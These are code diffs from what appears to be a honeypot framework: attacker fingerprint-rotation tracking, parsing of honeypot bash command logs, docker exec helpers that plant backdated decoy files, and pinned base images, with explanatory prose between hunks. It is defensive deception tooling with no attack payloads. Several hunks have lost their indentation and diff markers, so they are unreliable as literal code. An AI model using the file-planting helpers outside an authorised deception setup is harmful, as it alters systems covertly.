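        seen_now.add(identity)
        if len(primitives) < MIN_PRIMITIVES:
            continue
        signature = frozenset(primitives)
        if last_fired.get(identity) == signature:
            continue  # same primitive set as last fire: stay quiet
        last_fired[identity] = signature
        fired.append(identity)
    # Re-arm: forget identities that are no longer candidates.
    for stale in [k for k in last_fired if k not in seen_now]:
        del last_fired[stale]
    return fired


state: dict[str, frozenset[str]] = {}
print(tick({"id-1": ["p1", "p2"]}, state))        # fires
print(tick({"id-1": ["p1", "p2"]}, state))        # deduped
print(tick({"id-1": ["p1", "p2", "p3"]}, state))  # set grew, fires again
```

Using a `frozenset` as the signature makes the comparison order-independent, so a repository that returns the same primitives in a different order does not trigger a re-emit.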
def _now() -> float:
"""Wall-clock seconds. Wrapped so tests can monkeypatch."""
import time
return time.time()
__all__ = [
"run_attribution_loop",
"handle_observation_event",
"tick_multi_actor",
]


@@ -0,0 +1,153 @@
"""Attacker substrate-fingerprint rotation detection.
Called inline from the prober at each fingerprint emit site. Looks up
the last persisted hash for ``(attacker_uuid, port, probe_type)``;
when the new hash differs from the last one, emits a derived
``attacker.fingerprint_rotated`` event (bus + RFC 5424 syslog) and
stamps the ``Attacker`` row's rotation telemetry.
This is a pure library — no daemon, no async loop. The prober is the
only producer. We just teach it to derive a second event on hash
flip without standing up another worker (DEBT-032).
"""
from __future__ import annotations
import uuid as _uuid
from dataclasses import dataclass
from datetime import datetime
from typing import Any, Callable, Literal
from sqlmodel import Session, select
from decnet.web.db.models import Attacker, AttackerFingerprintState
ProbeType = Literal["jarm", "hassh", "tcpfp"]
RotationKind = Literal[
"no_attacker_row", # caller raced ahead of correlator; skip silently
"first_sighting", # state row created, no prior hash
"unchanged", # same hash as last sighting
"rotated", # hash differs; event emitted, Attacker stamped
]
PublishFn = Callable[[str, dict[str, Any]], None]
SyslogFn = Callable[[str, dict[str, Any]], None]
@dataclass
class RotationOutcome:
"""Return shape of :func:`record_fingerprint`. Caller usually
ignores it; useful for tests + tracing."""
kind: RotationKind
old_hash: str | None
new_hash: str
rotation_count: int
_ROTATED_EVENT_TYPE = "attacker.fingerprint_rotated"
def record_fingerprint(
session: Session,
*,
attacker_ip: str,
port: int,
probe_type: ProbeType,
new_hash: str,
ts: datetime,
publish_fn: PublishFn | None = None,
syslog_fn: SyslogFn | None = None,
) -> RotationOutcome:
"""Upsert state row; on hash diff, emit derived event + stamp.
Resolves ``attacker_uuid`` from ``attacker_ip`` via the existing
Attacker table. If no Attacker row exists yet (the prober raced
ahead of the correlator), returns ``kind="no_attacker_row"`` and
does nothing — the next probe cycle will pick it up once the
correlator has caught up.
State upsert + Attacker stamp + publish + syslog are committed in
one transaction so a partial failure can't desync state from
what was emitted.
"""
attacker = session.exec(
select(Attacker).where(Attacker.ip == attacker_ip)
).first()
if attacker is None:
return RotationOutcome(
kind="no_attacker_row",
old_hash=None,
new_hash=new_hash,
rotation_count=0,
)
row = session.exec(
select(AttackerFingerprintState).where(
AttackerFingerprintState.attacker_uuid == attacker.uuid,
AttackerFingerprintState.port == port,
AttackerFingerprintState.probe_type == probe_type,
)
).first()
if row is None:
session.add(AttackerFingerprintState(
uuid=str(_uuid.uuid4()),
attacker_uuid=attacker.uuid,
port=port,
probe_type=probe_type,
last_hash=new_hash,
last_seen=ts,
rotation_count=0,
))
session.commit()
return RotationOutcome(
kind="first_sighting",
old_hash=None,
new_hash=new_hash,
rotation_count=0,
)
if row.last_hash == new_hash:
row.last_seen = ts
session.add(row)
session.commit()
return RotationOutcome(
kind="unchanged",
old_hash=row.last_hash,
new_hash=new_hash,
rotation_count=row.rotation_count,
)
old_hash = row.last_hash
row.last_hash = new_hash
row.last_seen = ts
row.rotation_count += 1
session.add(row)
attacker.rotation_count += 1
attacker.last_rotation_at = ts
session.add(attacker)
payload: dict[str, Any] = {
"attacker_uuid": attacker.uuid,
"attacker_ip": attacker_ip,
"port": port,
"probe_type": probe_type,
"old_hash": old_hash,
"new_hash": new_hash,
"rotation_count": row.rotation_count,
"ts": ts.isoformat(),
}
if publish_fn is not None:
publish_fn(_ROTATED_EVENT_TYPE, payload)
if syslog_fn is not None:
syslog_fn(_ROTATED_EVENT_TYPE, payload)
session.commit()
return RotationOutcome(
kind="rotated",
old_hash=old_hash,
new_hash=new_hash,
rotation_count=row.rotation_count,
)
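
The three persisted outcomes of `record_fingerprint` reduce to a small state machine. The sketch below replays it against an in-memory dict instead of a database session. `FingerprintState` and `classify_sighting` are hypothetical names used only for illustration, and the `no_attacker_row` branch is left out because it depends on the Attacker table.

```python
from dataclasses import dataclass


@dataclass
class FingerprintState:
    """In-memory stand-in for one AttackerFingerprintState row (assumption)."""
    last_hash: str
    rotation_count: int = 0


def classify_sighting(state: dict, key: tuple, new_hash: str) -> str:
    """Return 'first_sighting', 'unchanged' or 'rotated' and update *state*."""
    row = state.get(key)
    if row is None:
        # No prior hash for this (attacker, port, probe_type) triple.
        state[key] = FingerprintState(last_hash=new_hash)
        return "first_sighting"
    if row.last_hash == new_hash:
        return "unchanged"
    # Hash differs: remember the new one and count the rotation.
    row.last_hash = new_hash
    row.rotation_count += 1
    return "rotated"
```

Keying the state on the full `(attacker, port, probe_type)` triple mirrors the three-column lookup in the query above, so a JARM change on one port does not count as a rotation for another probe type.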


@@ -32,6 +32,21 @@ _RFC5424_RE = re.compile(
r"(.+)$", # 5: SD element + optional MSG
)
# Honeypot SSH PROMPT_COMMAND lines arrive double-wrapped: the
# Docker-stdout collector envelope wraps the inner ``logger
# --rfc5424 --msgid command -t bash …`` line. Outer MSGID is NIL,
# real MSGID lives in the body. Mirrors the unwrap logic in
# ``decnet.collector.worker._INNER_RFC5424_RE`` — the two parsers
# read the same on-wire format.
_INNER_RFC5424_RE = re.compile(
r"^(\d{4}-\d{2}-\d{2}T\S+)\s+" # 1: inner TIMESTAMP
r"(\S+)\s+" # 2: inner HOSTNAME
r"(\S+)\s+" # 3: inner APP-NAME
r"\S+\s+" # PROCID (NIL or PID)
r"(\S+)\s+" # 4: inner MSGID
r"(.+)$", # 5: inner SD/MSG remainder
)
# Structured data block: [relay@55555 k="v" ...]
_SD_BLOCK_RE = re.compile(r'\[relay@55555\s+(.*?)\]', re.DOTALL)
@@ -121,6 +136,21 @@ def parse_line(line: str) -> LogEvent | None:
ts_raw, decky, service, event_type, sd_rest = m.groups()
# Unwrap double-wrapped Docker-stdout envelopes around bash
# PROMPT_COMMAND lines. See ``_INNER_RFC5424_RE`` and the matching
# logic in ``decnet.collector.worker.parse_rfc5424``. Must run
# before the decky/service NIL-guard below — the OUTER decky is
# the docker host, the inner header carries the real source.
if event_type == "-" and sd_rest.startswith("-"):
body = sd_rest[1:].lstrip()
inner = _INNER_RFC5424_RE.match(body)
if inner is not None:
_i_ts, i_host, i_app, i_msgid, i_rest = inner.groups()
decky = i_host
service = i_app
event_type = i_msgid
sd_rest = i_rest
if decky == "-" or service == "-":
return None
@@ -137,6 +167,19 @@ def parse_line(line: str) -> LogEvent | None:
msg = tail.group(1).strip() if tail else ""
attacker_ip = _extract_attacker_ip(fields, msg)
# Free-form bash PROMPT_COMMAND lines arrive with MSGID=NIL or MSGID=command
# and a body like `CMD uid=0 user=root src=… pwd=… cmd=<rest of line>`.
# Without this rewrite they're invisible to the behavioral profiler, which
# filters on event_type ∈ {command, exec, query, …}. The Dockerfile logger
# invocation uses --msgid command, so we must also handle the non-nil case.
if event_type in ("-", "command") and msg.startswith("CMD ") and "command" not in fields:
event_type = "command"
head, sep, cmd_rest = msg[4:].partition("cmd=")
for k, v in re.findall(r'(\w+)=(\S+)', head):
fields.setdefault(k, v)
if sep:
fields.setdefault("command", cmd_rest)
# Mutator-emitted transitions arrive on the same ingest stream but
# belong in the substrate-state index, not the per-IP attacker one.
kind: EventKind = (

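The unwrap and the `CMD` rewrite in this file can be exercised together on a single line. The sketch below reuses the inner-header pattern and the `partition("cmd=")` split from the diff; `split_cmd_body` is a hypothetical helper name, the sample line (host, PID, addresses) is invented, and stripping the leading NIL structured-data marker is an assumption about how the message body is isolated.

```python
import re

# Same shape as the inner-header pattern added in this diff.
INNER_RFC5424_RE = re.compile(
    r"^(\d{4}-\d{2}-\d{2}T\S+)\s+"  # 1: inner TIMESTAMP
    r"(\S+)\s+"                      # 2: inner HOSTNAME
    r"(\S+)\s+"                      # 3: inner APP-NAME
    r"\S+\s+"                        # PROCID (NIL or PID)
    r"(\S+)\s+"                      # 4: inner MSGID
    r"(.+)$",                        # 5: inner SD/MSG remainder
)


def split_cmd_body(msg: str) -> dict[str, str]:
    """Split ``CMD k=v ... cmd=<rest of line>`` into a field dict."""
    fields: dict[str, str] = {}
    if not msg.startswith("CMD "):
        return fields
    # Everything after the first "cmd=" is the command, spaces included.
    head, sep, cmd_rest = msg[4:].partition("cmd=")
    for key, value in re.findall(r"(\w+)=(\S+)", head):
        fields.setdefault(key, value)
    if sep:
        fields.setdefault("command", cmd_rest)
    return fields


# Hypothetical inner line; every value here is made up for the example.
body = (
    "2026-05-16T18:25:40+00:00 decky-01 bash 4242 command - "
    "CMD uid=0 user=root src=10.0.0.5 pwd=/root cmd=cat /etc/passwd"
)
inner = INNER_RFC5424_RE.match(body)
_ts, host, app, msgid, rest = inner.groups()
# Assumption: drop the NIL structured-data marker ("-") before the message.
fields = split_cmd_body(rest[1:].lstrip())
```

Splitting on the first `cmd=` rather than tokenising the whole body keeps commands containing spaces or `=` intact, at the cost of requiring `cmd=` to be the last key on the line.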

@@ -70,7 +70,7 @@ async def run_reuse_loop(
wake_tasks.append(asyncio.create_task(
_run_control_listener_signal(bus, "reuse-correlator"),
))
-except Exception as exc: # noqa: BLE001
except Exception as exc:
log.warning(
"reuse correlator: bus unavailable, running in poll-only mode: %s",
exc,
@@ -86,7 +86,7 @@ async def run_reuse_loop(
results = await engine.correlate_credential_reuse(
repo, min_targets=min_targets,
)
-except Exception: # noqa: BLE001
except Exception:
log.exception("reuse correlator: tick failed")
results = []
@@ -120,11 +120,11 @@ async def run_reuse_loop(
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
-for t in (*wake_tasks, heartbeat_task):
-if t is None:
for task in (*wake_tasks, heartbeat_task):
if task is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
-await t
await task
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()
@@ -143,7 +143,7 @@ async def _wake_on(bus: BaseBus, wake: asyncio.Event, pattern: str) -> None:
wake.set()
except asyncio.CancelledError:
raise
-except Exception as exc: # noqa: BLE001
except Exception as exc:
log.warning(
"reuse correlator: subscriber for %s died (%s); falling back to poll",
pattern, exc,

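The shutdown hunk above cancels every background task and then awaits each one under `contextlib.suppress`. A minimal standalone sketch of that cancel-then-drain pattern follows; `cancel_and_drain` and `demo` are hypothetical names, and the sleeping coroutine stands in for the real wake and heartbeat tasks.

```python
import asyncio
import contextlib
from typing import Iterable, Optional


async def cancel_and_drain(tasks: Iterable[Optional[asyncio.Task]]) -> None:
    """Cancel every task, then await each one so nothing is left pending."""
    live = [task for task in tasks if task is not None]
    for task in live:
        task.cancel()
    for task in live:
        # Awaiting a cancelled task re-raises CancelledError here; swallow it
        # (and any late failure) because shutdown must not raise.
        with contextlib.suppress(asyncio.CancelledError, Exception):
            await task


async def demo() -> bool:
    async def sleeper() -> None:
        await asyncio.sleep(3600)

    wake_task = asyncio.create_task(sleeper())
    heartbeat_task = None  # e.g. the heartbeat was never started
    await asyncio.sleep(0)  # give the task a chance to start
    await cancel_and_drain([wake_task, heartbeat_task])
    return wake_task.cancelled()
```

`asyncio.CancelledError` has to be listed explicitly because it derives from `BaseException` on Python 3.8 and later, so `suppress(Exception)` alone would let it escape.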

@@ -0,0 +1,39 @@
"""Shared primitives for writing/deleting files inside running deckies.

The canary planter and the orchestrator SSH driver both need to drop
bytes into a decky container's filesystem, then sometimes unlink them.
The ARG_MAX-safe ``base64 -d``-via-stdin trick lived in two places
before this module existed.

Public API:

* :func:`write_file_to_container`: write bytes at a path, set mode,
  optionally backdate mtime.
* :func:`delete_file_from_container`: best-effort ``rm -f``.
* :func:`resolve_topology_container`: pick the right docker container
  for a MazeNET decky based on its services list.
* :func:`resolve_decky_container`: async helper that takes
  ``(decky_name, topology_id?)``, hydrates the topology when needed,
  and returns the docker container name.

Container resolution conventions are documented in
:mod:`decnet.topology.compose`; we mirror them here without taking
a runtime dependency on the compose generator.
"""
from __future__ import annotations

from .resolve import (
    resolve_decky_container,
    resolve_topology_container,
)
from .write import (
    delete_file_from_container,
    write_file_to_container,
)

__all__ = [
    "delete_file_from_container",
    "resolve_decky_container",
    "resolve_topology_container",
    "write_file_to_container",
]


@@ -0,0 +1,72 @@
"""Decky-name → docker container name resolution.

Two scopes:

* **Fleet**: every fleet decky has an ``ssh`` service container named
  ``<decky_name>-ssh`` (see :mod:`decnet.services.ssh`). We always
  target it because it carries the most realistic filesystem layout.
* **MazeNET (topology)**: same ``<name>-ssh`` convention when the
  decky exposes the ssh service; otherwise the decky's base container
  named ``decnet_t_<topology_id8>_<decky_name>`` (matches
  :func:`decnet.topology.compose._container_name`).

Keeping resolution centralised here means new ``docker exec`` callers
(file drops, future bulk planters, etc.) never need to learn the
naming conventions; they just call :func:`resolve_decky_container`.
"""
from __future__ import annotations

from typing import Any, Iterable, Optional

_SSH_CONTAINER_SUFFIX = "-ssh"


def resolve_topology_container(
    topology_id: str, decky_name: str, services: Iterable[str],
) -> str:
    """Container name for a MazeNET decky.

    See module docstring for the convention. Pure function, no I/O.
    """
    if "ssh" in set(services):
        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
    return f"decnet_t_{topology_id[:8]}_{decky_name}"


async def resolve_decky_container(
    repo: Any,
    decky_name: str,
    *,
    topology_id: Optional[str] = None,
) -> str:
    """Resolve the docker container name for *decky_name*.

    Fleet path (``topology_id is None``): returns ``<decky_name>-ssh``
    unconditionally. No DB lookup: the caller is responsible for
    knowing the decky exists; if it doesn't, the subsequent
    ``docker exec`` returns a clear error.

    Topology path: hydrates the topology, looks up the decky's services
    list, delegates to :func:`resolve_topology_container`.

    Raises:
        LookupError: when ``topology_id`` is set but the topology or
            its named decky doesn't exist. Callers translate this into
            404/422 at the API layer.
    """
    if topology_id is None:
        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
    from decnet.topology.persistence import hydrate

    hydrated = await hydrate(repo, topology_id)
    if hydrated is None:
        raise LookupError(f"topology {topology_id!r} not found")
    for decky in hydrated["deckies"]:
        cfg = decky.get("decky_config") or {}
        name = cfg.get("name") or decky.get("name")
        if name == decky_name:
            services = decky.get("services") or []
            return resolve_topology_container(topology_id, decky_name, services)
    raise LookupError(
        f"decky {decky_name!r} is not in topology {topology_id!r}"
    )
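
The naming rules in this file can be checked without a database or Docker. The sketch below restates the pure `resolve_topology_container` function so it runs standalone; the topology id and decky names in the usage lines are made up.

```python
from typing import Iterable

_SSH_CONTAINER_SUFFIX = "-ssh"


def resolve_topology_container(
    topology_id: str, decky_name: str, services: Iterable[str],
) -> str:
    """Container name for a topology decky (restated from the diff above)."""
    if "ssh" in set(services):
        # Deckies that expose ssh are always addressed via the ssh container.
        return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
    # Otherwise fall back to the base container, keyed by the first
    # eight characters of the topology id.
    return f"decnet_t_{topology_id[:8]}_{decky_name}"


# Hypothetical inputs.
with_ssh = resolve_topology_container("0123456789abcdef", "web01", ["http", "ssh"])
without_ssh = resolve_topology_container("0123456789abcdef", "web01", ["http"])
```

Here `with_ssh` is `"web01-ssh"` and `without_ssh` is `"decnet_t_01234567_web01"`.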

124
decnet/decky_io/write.py Normal file

@@ -0,0 +1,124 @@
"""``docker exec``-driven file write/delete inside a decky container.

The write path streams a base64-encoded payload over stdin to
``base64 -d`` inside the container, so binary content of any size up
to docker's stream limits is safe. Interpolating the bytes into argv
would hit the kernel's argument-size limits for any non-trivial blob
(Linux caps a single argument at 128 KiB via ``MAX_ARG_STRLEN``).
"""
from __future__ import annotations

import asyncio
import base64
import shlex
from datetime import datetime, timezone
from typing import Optional

from decnet.logging import get_logger

log = get_logger("decky_io.write")

_DOCKER = "docker"
_DEFAULT_TIMEOUT = 8.0


def _dirname(path: str) -> str:
    idx = path.rfind("/")
    if idx <= 0:
        return "/"
    return path[:idx]


async def _run(
    argv: list[str],
    *,
    stdin_bytes: Optional[bytes] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[int, str, str]:
    try:
        proc = await asyncio.create_subprocess_exec(
            *argv,
            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
    except FileNotFoundError as exc:
        return 127, "", f"argv[0] not found: {exc}"
    try:
        stdout, stderr = await asyncio.wait_for(
            proc.communicate(input=stdin_bytes), timeout=timeout,
        )
    except asyncio.TimeoutError:
        try:
            proc.kill()
        except ProcessLookupError:
            pass
        # Reap the killed child so it does not linger as a zombie.
        await proc.wait()
        return 124, "", "timeout"
    return (
        proc.returncode if proc.returncode is not None else -1,
        stdout.decode("utf-8", "replace"),
        stderr.decode("utf-8", "replace"),
    )


async def write_file_to_container(
    container: str,
    path: str,
    content: bytes,
    *,
    mode: int = 0o644,
    mtime: Optional[datetime] = None,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Write *content* to *path* inside *container* via ``docker exec``.

    The directory above *path* is created if missing; *mode* is applied
    after the write; when *mtime* is provided the file is backdated via
    ``touch -d`` with a UTC timestamp (``YYYY-MM-DD HH:MM:SS UTC``).

    Returns ``(success, error_or_none)``. ``error`` is the trimmed
    docker stderr on rc != 0, or a short "rc=<n>" if stderr was empty.
    """
    if not path:
        return False, "empty path"
    encoded = base64.b64encode(content)
    parts = [
        f"mkdir -p {shlex.quote(_dirname(path))}",
        f"base64 -d > {shlex.quote(path)}",
        f"chmod {mode:o} {shlex.quote(path)}",
    ]
    if mtime is not None:
        ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        parts.append(f"touch -d {shlex.quote(ts)} {shlex.quote(path)}")
    sh_cmd = " && ".join(parts)
    argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
    rc, _stdout, stderr = await _run(argv, stdin_bytes=encoded, timeout=timeout)
    success = rc == 0
    if success:
        return True, None
    err = stderr.strip()[:256] or f"rc={rc}"
    log.warning(
        "decky_io.write failed container=%s path=%s rc=%d stderr=%r",
        container, path, rc, stderr[:120],
    )
    return False, err


async def delete_file_from_container(
    container: str,
    path: str,
    *,
    timeout: float = _DEFAULT_TIMEOUT,
) -> tuple[bool, Optional[str]]:
    """Best-effort ``rm -f`` of *path* inside *container*.

    Returns ``(success, error_or_none)``. ``rm -f`` returns rc=0 even
    when the file is already gone, so a True result here means "the
    file is not present after this call", regardless of who unlinked it.
    """
    sh_cmd = f"rm -f {shlex.quote(path)}"
    argv = [_DOCKER, "exec", container, "sh", "-c", sh_cmd]
    rc, _stdout, stderr = await _run(argv, timeout=timeout)
    if rc == 0:
        return True, None
    return False, stderr.strip()[:256] or f"rc={rc}"
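
To see why the payload travels over stdin rather than argv, it helps to look at the command that would be executed. The sketch below only builds the `docker exec` argv and the base64 payload, without running Docker; `build_write_argv` is a hypothetical helper, and the container name and path are invented.

```python
import base64
import posixpath
import shlex


def build_write_argv(
    container: str, path: str, content: bytes, mode: int = 0o644,
) -> tuple[list[str], bytes]:
    """Return ``(argv, stdin_payload)`` for a stdin-streamed file write."""
    parent = posixpath.dirname(path) or "/"
    script = " && ".join([
        f"mkdir -p {shlex.quote(parent)}",
        # The file content is read from stdin, so it never appears in argv.
        f"base64 -d > {shlex.quote(path)}",
        f"chmod {mode:o} {shlex.quote(path)}",
    ])
    argv = ["docker", "exec", "-i", container, "sh", "-c", script]
    return argv, base64.b64encode(content)


# Hypothetical container and path; note the space in the file name.
argv, payload = build_write_argv(
    "web01-ssh", "/home/admin/my notes.txt", b"\x00\xff",
)
```

Only the quoted path and mode end up in the shell script, so its length stays small no matter how large `content` is, and `shlex.quote` keeps a path with spaces or shell metacharacters from being reinterpreted by `sh -c`.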


@@ -18,69 +18,86 @@ class DistroProfile:
build_base: str # apt-compatible image for service Dockerfiles (FROM ${BASE_IMAGE})
# Base images are pinned by digest (sha256) to make `docker pull`
# reproducible — a registry-side rebuild of "debian:bookworm-slim"
# can't silently swap content under us. The :tag is kept for human
# readability; the @sha256 is what Docker actually resolves.
# Refresh procedure: `docker pull <tag>` then `docker inspect
# --format '{{index .RepoDigests 0}}' <tag>`. Last refreshed 2026-05-03.
_DEBIAN_BOOKWORM = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252"
_UBUNTU_22_04 = "ubuntu:22.04@sha256:962f6cadeae0ea6284001009daa4cc9a8c37e75d1f5191cf0eb83fe565b63dd7"
_UBUNTU_20_04 = "ubuntu:20.04@sha256:8feb4d8ca5354def3d8fce243717141ce31e2c428701f6682bd2fafe15388214"
_ROCKY_9 = "rockylinux:9-minimal@sha256:305de618a5681ff75b1d608fd22b10f362867dff2f550a4f1d427d21cd7f42b4"
_CENTOS_7 = "centos:7@sha256:be65f488b7764ad3638f236b7b515b3678369a5124c47b8d32916d6487418ea4"
_ALPINE_3_19 = "alpine:3.19@sha256:6baf43584bcb78f2e5847d1de515f23499913ac9f12bdf834811a3145eb11ca1"
_FEDORA_39 = "fedora:39@sha256:d63d63fe593749a5e8dbc8152427d40bbe0ece53d884e00e5f3b44859efa5077"
_KALI_ROLLING = "kalilinux/kali-rolling@sha256:1fd0364490011f245688c6ed9fee498a11cd779badfbb0b1d3a721d0f49f2d15"
_ARCH_LATEST = "archlinux:latest@sha256:5ba8bb318666baef4d33afefc0e65db80f38b23503cb8e7b150d315cc2d4d5da"
DISTROS: dict[str, DistroProfile] = {
"debian": DistroProfile(
slug="debian",
-image="debian:bookworm-slim",
image=_DEBIAN_BOOKWORM,
display_name="Debian 12 (Bookworm)",
hostname_style="generic",
-build_base="debian:bookworm-slim",
build_base=_DEBIAN_BOOKWORM,
),
"ubuntu22": DistroProfile(
slug="ubuntu22",
-image="ubuntu:22.04",
image=_UBUNTU_22_04,
display_name="Ubuntu 22.04 LTS (Jammy)",
hostname_style="generic",
-build_base="ubuntu:22.04",
build_base=_UBUNTU_22_04,
),
"ubuntu20": DistroProfile(
slug="ubuntu20",
-image="ubuntu:20.04",
image=_UBUNTU_20_04,
display_name="Ubuntu 20.04 LTS (Focal)",
hostname_style="generic",
-build_base="ubuntu:20.04",
build_base=_UBUNTU_20_04,
),
"rocky9": DistroProfile(
slug="rocky9",
-image="rockylinux:9-minimal",
image=_ROCKY_9,
display_name="Rocky Linux 9",
hostname_style="rhel",
-build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
),
"centos7": DistroProfile(
slug="centos7",
-image="centos:7",
image=_CENTOS_7,
display_name="CentOS 7",
hostname_style="rhel",
-build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
),
"alpine": DistroProfile(
slug="alpine",
-image="alpine:3.19",
image=_ALPINE_3_19,
display_name="Alpine Linux 3.19",
hostname_style="minimal",
-build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
),
"fedora": DistroProfile(
slug="fedora",
-image="fedora:39",
image=_FEDORA_39,
display_name="Fedora 39",
hostname_style="rhel",
-build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
),
"kali": DistroProfile(
slug="kali",
-image="kalilinux/kali-rolling",
image=_KALI_ROLLING,
display_name="Kali Linux (Rolling)",
hostname_style="rolling",
-build_base="kalilinux/kali-rolling", # Debian-based, apt-get compatible
build_base=_KALI_ROLLING, # Debian-based, apt-get compatible
),
"arch": DistroProfile(
slug="arch",
-image="archlinux:latest",
image=_ARCH_LATEST,
display_name="Arch Linux",
hostname_style="rolling",
-build_base="debian:bookworm-slim", # Dockerfiles use apt-get; fall back to debian
build_base=_DEBIAN_BOOKWORM, # Dockerfiles use apt-get; fall back to debian
),
}

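Because every base image is now expected to carry an `@sha256:` digest, a small check can catch an entry that slips back to a bare tag. The sketch below is one way to do that under stated assumptions: `split_pinned_ref` and `unpinned` are hypothetical helpers, and the pattern only accepts the `name[:tag]@sha256:<64 hex>` form used in this diff.

```python
import re

# name[:tag]@sha256:<64 lowercase hex characters>
_PINNED_RE = re.compile(r"^(?P<name>[^@\s]+)@sha256:(?P<digest>[0-9a-f]{64})$")


def split_pinned_ref(ref: str) -> tuple[str, str]:
    """Return ``(name_with_tag, digest)`` or raise ValueError if unpinned."""
    match = _PINNED_RE.match(ref)
    if match is None:
        raise ValueError(f"image reference is not digest-pinned: {ref!r}")
    return match.group("name"), match.group("digest")


def unpinned(images: dict[str, str]) -> list[str]:
    """Slugs whose image reference lacks a valid sha256 digest."""
    bad = []
    for slug, ref in images.items():
        try:
            split_pinned_ref(ref)
        except ValueError:
            bad.append(slug)
    return sorted(bad)
```

A unit test could feed it `{slug: profile.image for slug, profile in DISTROS.items()}` and assert the result is empty, which would turn an accidental unpinned tag into a test failure rather than a silent drift.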

@@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
"""
import asyncio
import json
import shutil
import subprocess # nosec B404
import time
@@ -57,6 +58,8 @@ _CANONICAL_AUTH_HELPER_DIR = Path(__file__).parent.parent / "templates" / "_shar
_AUTH_HELPER_SERVICES = {"ssh", "telnet"}
_CANONICAL_NTLMSSP = Path(__file__).parent.parent / "templates" / "_shared" / "ntlmssp.py"
_NTLMSSP_SERVICES = {"smb", "rdp"}
_CANONICAL_CADDY_MODULES_DIR = Path(__file__).parent.parent / "templates" / "_caddy_modules"
_CADDY_SERVICES = {"http", "https"}
def _sync_logging_helper(config: DecnetConfig) -> None:
@@ -163,6 +166,104 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
shutil.copy2(src, dest)
def _chown_tree(dest: Path, owner_ref: Path) -> None:
"""Recursively set uid/gid of *dest* to match *owner_ref*. No-op if not root."""
import os
if os.geteuid() != 0:
return
st = owner_ref.stat()
uid, gid = st.st_uid, st.st_gid
targets = [dest] + list(dest.rglob("*")) if dest.is_dir() else [dest]
for p in targets:
try:
os.lchown(p, uid, gid)
except OSError:
pass
def _sync_caddy_modules(config: DecnetConfig) -> None:
"""Mirror _caddy_modules/ into http/https build contexts.
The xcaddy builder stage in each Dockerfile references
``_caddy_modules/decnetfp`` relative to its build context (the
per-service template dir). Since the canonical source lives one
level up at ``templates/_caddy_modules/``, we sync it into each
active http/https build context before compose up, mirroring the
sessrec / auth-helper patterns.
"""
from decnet.services.registry import get_service
src_dir = _CANONICAL_CADDY_MODULES_DIR
if not src_dir.is_dir():
return
seen: set[Path] = set()
for decky in config.deckies:
for svc_name in decky.services:
if svc_name not in _CADDY_SERVICES:
continue
svc = get_service(svc_name)
if svc is None:
continue
ctx = svc.dockerfile_context()
if ctx is None or ctx in seen:
continue
seen.add(ctx)
dest_dir = ctx / "_caddy_modules"
dest_dir.mkdir(exist_ok=True)
for child in src_dir.iterdir():
dest_child = dest_dir / child.name
if child.is_dir():
if dest_child.exists():
shutil.rmtree(dest_child)
shutil.copytree(child, dest_child)
_chown_tree(dest_child, src_dir)
else:
if not dest_child.exists() or dest_child.read_bytes() != child.read_bytes():
shutil.copy2(child, dest_child)
_chown_tree(dest_child, src_dir)
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
"""Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
Used for post-deploy verification: ``compose up -d`` returns 0 the
moment containers are *started*, but a service that crashes on boot
(port collision, bad image, missing dependency) only shows up here.
Returns an empty list when compose has nothing to report (and on
parse failure — caller treats that as 'unverifiable, don't gate').
"""
cmd = [
"docker", "compose", "-p", "decnet", "-f", str(compose_file),
"ps", "--all", "--format", "json",
]
try:
result = subprocess.run( # nosec B603
cmd, capture_output=True, text=True, check=False,
)
except FileNotFoundError:
return []
if result.returncode != 0:
return []
rows: list[dict[str, object]] = []
# ``docker compose ps --format json`` emits one JSON object per line
# (newline-delimited), not a JSON array. Parse line-by-line so a
# single bad line doesn't poison the whole result.
for line in (result.stdout or "").splitlines():
line = line.strip()
if not line:
continue
try:
obj = json.loads(line)
except json.JSONDecodeError:
continue
if isinstance(obj, dict):
rows.append(obj)
elif isinstance(obj, list):
for item in obj:
if isinstance(item, dict):
rows.append(item)
return rows
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
import os
# -p decnet pins the compose project name. Without it, docker compose
@@ -393,6 +494,8 @@ def _compose_with_retry(
console.print(f"[red]{result.stderr.strip()}[/]")
log.error("docker compose %s failed after %d attempts: %s",
" ".join(args), retries, result.stderr.strip())
if last_exc is None: # pragma: no cover — retries=0 is not a supported call
raise RuntimeError("_compose_with_retry exhausted retries without capturing an error")
raise last_exc
@@ -562,6 +665,7 @@ def deploy(config: DecnetConfig, dry_run: bool = False, no_cache: bool = False,
_sync_sessrec_sources(config)
_sync_auth_helper_sources(config)
_sync_ntlmssp_sources(config)
_sync_caddy_modules(config)
compose_path = write_compose(config, COMPOSE_FILE)
console.print(f"[bold cyan]Compose file written[/] → {compose_path}")
@@ -951,8 +1055,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
)
raise
-await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
